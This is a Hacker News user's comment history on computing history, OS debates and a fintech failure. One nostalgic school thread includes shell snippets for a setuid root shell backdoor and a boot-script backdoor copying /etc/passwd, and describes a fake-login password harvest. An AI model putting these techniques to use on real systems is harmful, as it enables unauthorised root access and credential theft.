cloudsec9's comments | Hacker News

"The basics are simple" ... hrm. I think the concepts of how Twitter works is simple; but during their "fail whale" days, they had to reinvent things on the fly to achieve scale and reliability.

Twitter used to have lots of moving parts, with money flowing from various ads and placements, and that was much more complex than I think people appreciate. With their new head twit, they destroyed most of their ad revenue stream and are now hyping paying for APIs and posting privileges, and it shows.

My main irritation is that people say it "works fine" when lots of crap is broken all over and it now has regular outages. Since the takeover they have shipped like ONE feature, and that was mostly done beforehand.


Another operating system that deserves mention for 286-class machines is Coherent. This was a Unix-like OS you could buy for $99; it had all of the various Unix utilities and came with a HUGE manual to help you learn it.

They had a 386 version as well, but went all in on getting X-windows and graphics working, and ignored TCP/IP networking just as the Internet started to gain a lot of traction. Still an interesting OS to look at!


The final version of Coherent is FOSS now:

https://github.com/gspu/Coherent


At our school, the "computer" teachers were often specialists in other areas who had some interest in computers, and weren't very ... security aware. They all had admin/root access, and they'd often forget to sign out, leaving us with the keys to the kingdom, at least temporarily.

We figured out how to create a SUID shell, so we could get back to root even after we had logged out. Poking a few bytes would have been more interesting!
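
For anyone who never saw the trick, a minimal sketch of the classic setuid-shell move, assuming a stock Unix layout (the paths here are illustrative, not the ones we actually used):

    # Run while an admin/root session is still live (e.g. a forgotten logout).
    # The copy ends up owned by root; the setuid bit makes it run as root later.
    cp /bin/sh /tmp/.notashell
    chmod 4755 /tmp/.notashell   # setuid root + world-executable

Running /tmp/.notashell afterwards drops you straight into a root shell. (Many modern shells deliberately drop setuid privileges unless invoked with -p, so this is strictly a period piece.)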


I really enjoyed the whole process of figuring out how to get the keys to the kingdom. Our teachers were pretty good about logging out after they were done. The first way I got root was by running a fake login program remotely from another computer. That was a thing about the Icons: you could run programs remotely from another computer. I knew which computer the teachers liked to log into, so I patiently waited. Eventually it happened; he tried to log in, got "Invalid password or login name", and thought he had fat-fingered it. Meanwhile I now had root's password.

At that point I put a backdoor in one of the bootup shell scripts (sketched below), which checked for the presence of a file; if that file existed, it would copy the first part of the password file somewhere else. If they changed root's password, I would create the file, reboot my computer, then check for the copy of "passwd". The passwords were in plaintext; they weren't stored as a hash. I discovered the poke method later, as I got bored of my existing method.

I once got a copy of an exam before the actual exam. I saw the teacher printing something out on the dot matrix printer and guarding the contents, so I logged in as root and copied the printer spool file. Upon examining the file I discovered it was an exam.
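
A hedged sketch of what that boot-script backdoor could have looked like; the trigger and stash paths are made up for illustration:

    # Appended to a system boot script, which runs as root.
    # If the trigger file exists, stash the start of the (plaintext!)
    # password file where a normal user can read it, then clean up.
    if [ -f /tmp/.trigger ]; then
        head -10 /etc/passwd > /usr/tmp/.stash
        rm -f /tmp/.trigger
    fi

Because the boot scripts ran as root, this kept working even after the root password was changed.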


At one time I was a big advocate for Unix/Linux on the desktop, but I think that ship has mostly sailed.

But it seems that FUD about what it is capable of is still alive and well, which is good to know. With modern frameworks and libraries, there is a 0% chance your Windows app won't need SOME update within a couple of years, never mind five.

Now, there are lots of headwinds against Linux -- Windows is a known quantity, everyone knows the MS Office suite, people hate change and don't want to learn new stuff.

But to pretend that Linux is a house of cards because there are sometimes issues that cause trouble is not being honest. Even Windows can have big issues, or have we forgotten the CrowdStrike outage earlier this year?

All OSes have always had issues; that's why all of them have patches and updates.


I would blame Microsoft for that one, since they had the ability to keep CrowdStrike and others who have no business being in the NT kernel out of it, but instead gave them access by issuing code-signing certificates.

Apple on the other hand got them to switch to userspace:

https://www.crowdstrike.com/en-us/blog/crowdstrike-supports-...


>everyone knows the MS Office suite

How many people are running a locally-installed office suite at this point? Mailing files around seems archaic for most purposes. At my prior (open source) employer, even we had mostly given up on running local office productivity apps.


This is a broken mindset: that you should be able to take an app and use it for 5+ years. When computers were in their infancy and systems were only updated every 4-6 years, it might have made sense, but it doesn't in our modern software environment.

Nowadays all software is built on libraries and frameworks, and those have security issues and plain bugs, and you want those fixes. If you want to run 5+ year old software, you can now run it in a VM at near-native speed on almost any computer; so why does my shiny new OS have to run ancient binaries again?
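
To make the VM route concrete, a sketch assuming QEMU and a disk image you have prepared yourself (the image name is hypothetical):

    # Boot a legacy 32-bit environment with hardware virtualization.
    # -enable-kvm is Linux-specific; omit it on other hosts.
    qemu-system-i386 -enable-kvm -m 256 -hda legacy-app.img

With hardware virtualization the old binaries run at close to native speed, which is the point: the guest stays frozen in time while the host OS keeps moving.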


Without intending to be inflammatory, I think that the mindset that you are espousing is broken.

Security is a real issue for a subset of computing tasks. To further your point, for those tasks you can argue that constant vigilance and patching are a necessity of the modern world (an alternative, and arguably better, approach would be formal verification and not updating, as is often applied in safety-critical control systems). However, security is often used as a pernicious ruse for forcing obsolescence: want the latest security patches? Update to the latest OS version. Oh look, the latest OS version no longer runs on your perfectly good hardware. Or similarly, oh look, your perfectly good software no longer runs on the latest OS version.

But now consider the subset of computing that does not need to involve security, either because it has literally no security implications or because it can be sandboxed by the OS (e.g. games, music and video production, architectural design, scientific simulation, mathematical research, ...). There is a large body of this kind of software that works perfectly well for any number of years (modulo forced-obsolescence initiatives like "modernising" the UI or moving to the cloud). I would argue that the primary function of the OS should be to provide a stable platform for running such software securely. Yes, the user could learn how to run it under emulation, in a container or a VM, but then what is the purpose of the OS?

The alternative is a high software maintenance burden/cost for everyone (for applications just to keep the lights on, or for users to stay current in a churning software landscape) and/or the destruction of a massive amount of value in software that has been developed but can no longer easily be run. The value destruction here is twofold: (1) the licensee can no longer run the software that they paid for, and (2) the effort expended to develop said software is discarded.


Okay, I understand what you are trying to say, but some of your examples don't support your argument. Games, unless they are simple single-player games, need the network. Scientific sims and math research are best served by the latest hardware, which often needs the latest OS/software to get the most out of it. I think you're arguing that MOST software should run without needing to be updated, and when we lived in a dial-up world and before, that was a very viable position. But with all of our machines on an always-on network, the OS has to be kept up to date.

Most businesses just want things to work; their software/hardware costs are often rounding errors when amortized over their lifetime. I'm sympathetic to users who have paid for programs wanting to run them forever, but software businesses have to make money and sell new versions, so they add new features and follow the OS upgrades. It's hard for businesses to support older software or a big diversity of versions; it's why companies mandate a standard and try to enforce it.

With Microsoft, they are making millions on the OS and related basic programs, and so can afford to support things for a long time. With OSS like Linux, there is less funding and there are fewer people interested in running old versions. As someone who has had to keep some software up to date on Linux, it can sometimes be more of a pain to update a package (because of dependencies) than to just recompile the thing from source. The 5 years that LTS releases get are good for 2 average commercial update cycles, which I think is reasonable. Beyond that, people's skills are going to be out of date.
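
To illustrate the recompile-from-source point, the classic autotools flow (the tarball name and prefix are hypothetical, and many projects use CMake or Meson instead):

    # Unpack, configure, build, and install a release tarball.
    tar xzf some-tool-1.2.tar.gz
    cd some-tool-1.2
    ./configure --prefix=/usr/local
    make
    sudo make install

Sometimes that really is less hassle than untangling a distro's dependency graph for one package.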


Because you might want to run more than one program at a time without having to spin up a VM to do it.


I run many programs at the same time AND run VMs; as long as you have enough memory, this shouldn't be an issue.


I'd disagree that OS/2 was "worthless garbage", as MS would keep using it for several generations as the basis of their server/LAN OS.

I'd argue that OS/2 2.x was pretty much a ground-up re-write, as OS/2 1.x had been written for 16-bit 286 protected mode and not the 32-bit 386 protected mode which the next version targeted. IBM did insist that the new version run all of the 1.x 16 bit stuff, but like DOS and Win 3.x mode this was done through some virtualization if memory serves.

The big hurdle OS/2 faced was being memory-hungry at a time when memory prices were still high and the installed base had less than half of the required amount by default.


It wasn't just memory requirements that hurt OS/2. I'd argue one of the biggest hurdles was that IBM couldn't stop being IBM for even one second to reflect on the realities of the PC market. They still thought they were going to have a renaissance with 386 PS/2 systems, for goodness' sake.

And man, were they expensive. $195 for OS/2 2.0. That's about $434 in 2024 dollars, and the PS/2 systems that ran it best started north of $2k, if memory serves. No one outside of corporate and the biggest enthusiasts was shelling out that kind of money for "a better DOS than DOS" (cough DESQview cough) or "a better Windows (3.1) than Windows (3.1)" (irrelevant and not that impressive imho).

Love them or hate them, Microsoft has always been good at hitting the 75th percentile, aka "good enough" and "cheap enough". They proved (conclusively) that customers will put up with a mountain of shit if you cost half of what your competitors do. Plus they knew how to make ISVs a lot of money too. IBM just couldn't get its head out of its ass, I mean the 1960s.

And for the record, I salivated over OS/2. I scored a beta of 2.0 when I was 14 off of a BBS associate. I had an IBM laser printer, IBM typewriters, an original IBM PC. I thought back then that IBM meant quality (and to be fair, it did).

But they didn't get it and Microsoft did. Windows 95 had pizzazz and hype; the CD had Weezer's Buddy Holly video (video!). They were working to get games running right under 95. They were courting all of the biggest application vendors. They were doing shit. IBM? Too busy being IBM.


> They still thought they were going to have a renaissance with 386 PS/2 systems for goodness sakes.

Yeah but...

If OS/2 1.x had been a 386 OS and delivered on the promise: great DOS compatibility, multitasking including DOS apps, and built-in networking, with a passable GUI based on Windows 2...

I think it could have been a hit.

I was there, supporting this stuff in production back then.

DOS was a PITA. Getting networking working on DOS while still having enough of that all-important first 640kB of RAM left to run anything was hard. I was a master of it. My skills at it landed me several jobs.

NT made all that disappear. RAM was just RAM, each DOS session got all of a virtual instance's RAM dedicated just to it -- and a network drive looked like a local drive. It was like black magic. It was amazing.

Big drives, with a solid filesystem. Long file names. TCP/IP in the box, as standard.

NT 3.1 was amazing stuff, but that was in 1993 and you needed a £5000 PC with 32MB to run it.

OS/2 2.0 delivered this, smaller and faster, in a quarter of the RAM, the year before...

It was amazing. It was a phase shift in the industry. But the networking was extra, TCP/IP was extra, etc. etc.

And it was late. I just wrote about the beta of MICROSOFT OS/2 2.0:

https://www.theregister.com/2024/03/11/trying_ms_prerelease_...

This stuff was ready in 1990.

But if IBM hadn't screwed the project in 1985 or so, OS/2 1.0 could have done that in 1987 or so.

Before Linux (1991), before Windows 3 (1990), before 386BSD (begun 1989).

It could have been the amazing thing that the hype promised. The tech was there and it worked. It could have been made ready in the 1980s.

A PC industry controlled by IBM would be no better than one controlled by Microsoft and it would have been more expensive.

But we all suffered years more of the crap of DOS and DOS memory management and Windows 3.x, because IBM fscked up.

I don't know what would have happened.

Maybe it would have forced the Unix folks to adopt Arm 20 or 30 years earlier and make RISC boxes that were cheaper and cooler-running than x86? Maybe those expensive IBM OS/2 x86 machines would have forced BSD onto Arm and what happened 25Y later with Apple kit happened a generation before with Acorn kit.

I am 100% not saying it would have been a better world... but it would have been a much more different one than the closed, narrow imaginations of today portray.


> IBM did insist that the new version run all of the 1.x 16 bit stuff, but like DOS and Win 3.x mode this was done through some virtualization if memory serves.

Kind of, but IIRC it was a fundamentally different and more low-level kind of "virtualization": The 80386 processor's virtual[1] 8086 processor mode. Not much for them to do in the OS code itself, compared to writing a whole VM to run DOS apps on (he confidently says, never having written anything of the kind himself).

[1]: Probably not exactly the right word, but I can't recall the correct term right now.


To be fair, OS/2 could be run on less-beefy hardware that would've choked on NT 3.1.


By the time OS/2 came out, IBM wasn't a serious competitor for most OEMs -- they were high end, so were mostly competing with the likes of Compaq.

The big issue that no one is mentioning is that OS/2 needed 8MB of RAM to run decently, preferably more, but this was when most machines were 2-4MB and extra RAM was still a big cost.


> OS/2 needed 8MB of RAM to run decently,

That's OS/2 2.

OS/2 1 is the one that flopped, and nobody had 286 computers with 8MB of RAM.

Hell, the IBM 286 PS/2 machines shipped with 1MB and they cost $6-7K in '87-'88!


100%. I ran it on 4MB and IMHO it was fine, but it did need 8MB to shine.


Slight correction - there were some Borland tools for OS/2, but after the split MS stopped putting out new tools. IBM did have some interesting compiler stuff too, though.


https://en.wikipedia.org/wiki/VisualAge

> In 1992, Apple and IBM cofounded Taligent, based upon Pink, an operating system with a mass of sophisticated object-oriented compiler and application framework technology from Apple. Pink became CommonPoint, the partnership was dissolved, and CommonPoint was absorbed into VisualAge starting with the Compound Document Framework to handle OLE objects in VisualAge C++ 3.5 for Windows. In February 1997, the first mass release of Taligent technology came in the form of the Open Class within VisualAge C++ 4.0 ... The original prototype which led to VisualAge was an attempt "to make something like the NeXT interface builder" within the Smalltalk/V development environment.


What eventually made it out of VisualAge into the wider FOSS world was Eclipse.

https://wiki.eclipse.org/FAQ_Where_did_Eclipse_come_from%3F

Eclipse is the FOSS version of the C/Java rewrite of VisualAge Smalltalk -- which is still on sale as VAST.

https://www.instantiations.com/company/history/


Fun 40-year incarnation history page!


More to the point, FDIC insurance covers a BANK failure; but in this instance it wasn't the bank that failed. It doesn't even seem it was Yotta that had the issue, but rather their transaction company, Synapse.

Now, if Synapse had created individual accounts for the Yotta depositors, we wouldn't be talking about this now. But what happened was that Synapse had a few accounts for Yotta and a bit of a records gap, which it seems is making it hard to tie Yotta depositors to their money. What's unclear is whether this is a Synapse issue, a Yotta issue, or something else.

But the fact that there is this accounting issue shows that there is a gap in how FinTechs are actually managing cash flows, to the risk and detriment of their customers/depositors.


It’s not just a matter of tying depositors to their money. There’s something like $100 million that’s actually missing. It’s not clear whether it’s just a matter of finding the accounts or whether it’s actually been stolen somehow. Synapse managed the money. They say it’s with Evolve Bank & Trust, but Evolve says they don’t have it. It seems likely that it was moved and they just lost track, but that doesn’t seem to be entirely known yet.


If it was fully disclosed that this was "gambling", then I might agree.

But it seems that it was more positioned as "a safe investment with okay returns and a lottery chance at winning above average returns". Gamblers don't need to know about FDIC insurance and the like.

There were shady goings-on that weren't clear to depositors -- what isn't clear is WHERE that shadiness was happening, but that doesn't mean they "got what was coming to them".

